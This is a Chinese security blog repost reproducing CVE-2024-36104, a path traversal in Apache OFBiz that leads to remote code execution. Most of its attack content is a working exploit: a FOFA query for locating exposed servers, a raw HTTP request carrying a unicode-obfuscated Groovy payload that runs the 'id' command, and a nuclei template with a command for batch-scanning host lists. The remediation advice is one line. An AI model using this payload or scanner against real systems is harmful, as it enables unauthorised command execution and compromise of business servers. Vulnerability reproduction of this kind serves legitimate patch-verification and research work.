漏洞复现-CVE-2024-36104[PoC]

admin 2024年6月6日21:09:01评论136 views字数 1928阅读6分25秒阅读模式

:漏洞名称

Apache OFBiz 路径遍历导致RCE

:漏洞描述

Apache OFBiz(Open For Business)是一个开源的企业资源规划(ERP)系统和企业应用框架,由Apache软件基金会开发和维护。OFBiz旨在提供一套全面的企业应用解决方案,涵盖了各种业务功能,包括订单管理、库存管理、会计、人力资源、电子商务等。
    该漏洞源于org.apache.otbiz.webapp.control.ControlFiter类对路径(请求URL中的特殊字符(如;、%2e)限制不当导致攻击者能够绕过后台功能点的过滤器验证,并通过webtools/control/ProgramExpor接囗的编程导出功能执行任意Groovy代码获取系统权限。

漏洞影响版本

Apache OFBiz < 18.12.14

:网络空间测绘查询

FOFA

app="Apache_OFBiz"

漏洞复现-CVE-2024-36104[PoC]

:漏洞复现

poc
POST /webtools/control/forgotPassword/%2e/%2e/ProgramExport HTTP/1.1Host: user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0Content-Type: application/x-www-form-urlencodedgroovyProgram=u0074u0068u0072u006fu0077u0020u006eu0065u0077u0020u0045u0078u0063u0065u0070u0074u0069u006fu006eu0028u0027u0069u0064u0027u002eu0065u0078u0065u0063u0075u0074u0065u0028u0029u002eu0074u0065u0078u0074u0029u003b

漏洞复现-CVE-2024-36104[PoC]

命令执行漏洞是指恶意用户通过输入特定的命令或者数据,成功地执行了系统命令,从而导致系统受到攻击。这种漏洞通常发生在没有充分验证用户输入的情况下,将用户提供的数据直接传递给系统命令执行的场景中
:批量检测
nuclei.exe -t CVE-2024-36104.yaml -l host.txt
id: CVE-2024-36104

info:
  name: Apache OFBiz 路径遍历导致RCE
  author: Adler
  severity: info
  description: |
    Apache OFBiz(Open For Business)是一个开源的企业资源规划(ERP)系统和企业应用框架,由Apache软件基金会开发和维护。OFBiz旨在提供一套全面的企业应用解决方案,涵盖了各种业务功能,包括订单管理、库存管理、会计、人力资源、电子商务等。
    该漏洞源于org.apache.otbiz.webapp.control.ControlFiter类对路径(请求URL中的特殊字符(如;、%2e)限制不当导致攻击者能够绕过后台功能点的过滤器验证,并通过webtools/control/ProgramExpor接囗的编程导出功能执行任意Groovy代码获取系统权限。

http:
  - raw: 
    - |
      POST /webtools/control/forgotPassword/%2e/%2e/ProgramExport HTTP/1.1
      Host: {{Hostname}}
      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
      Content-Type: application/x-www-form-urlencoded
      
      groovyProgram=\u0074\u0068\u0072\u006f\u0077\u0020\u006e\u0065\u0077\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0028\u0027\u0069\u0064\u0027\u002e\u0065\u0078\u0065\u0063\u0075\u0074\u0065\u0028\u0029\u002e\u0074\u0065\u0078\u0074\u0029\u003b

    matchers:
      - type: word
        part: body
        words:
          - uid
:修复建议
建议更新当前系统或软件至最新版,完成漏洞的修复。
 

原文始发于微信公众号(Adler学安全):漏洞复现-CVE-2024-36104

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年6月6日21:09:01
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   漏洞复现-CVE-2024-36104[PoC]https://cn-sec.com/archives/2823263.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息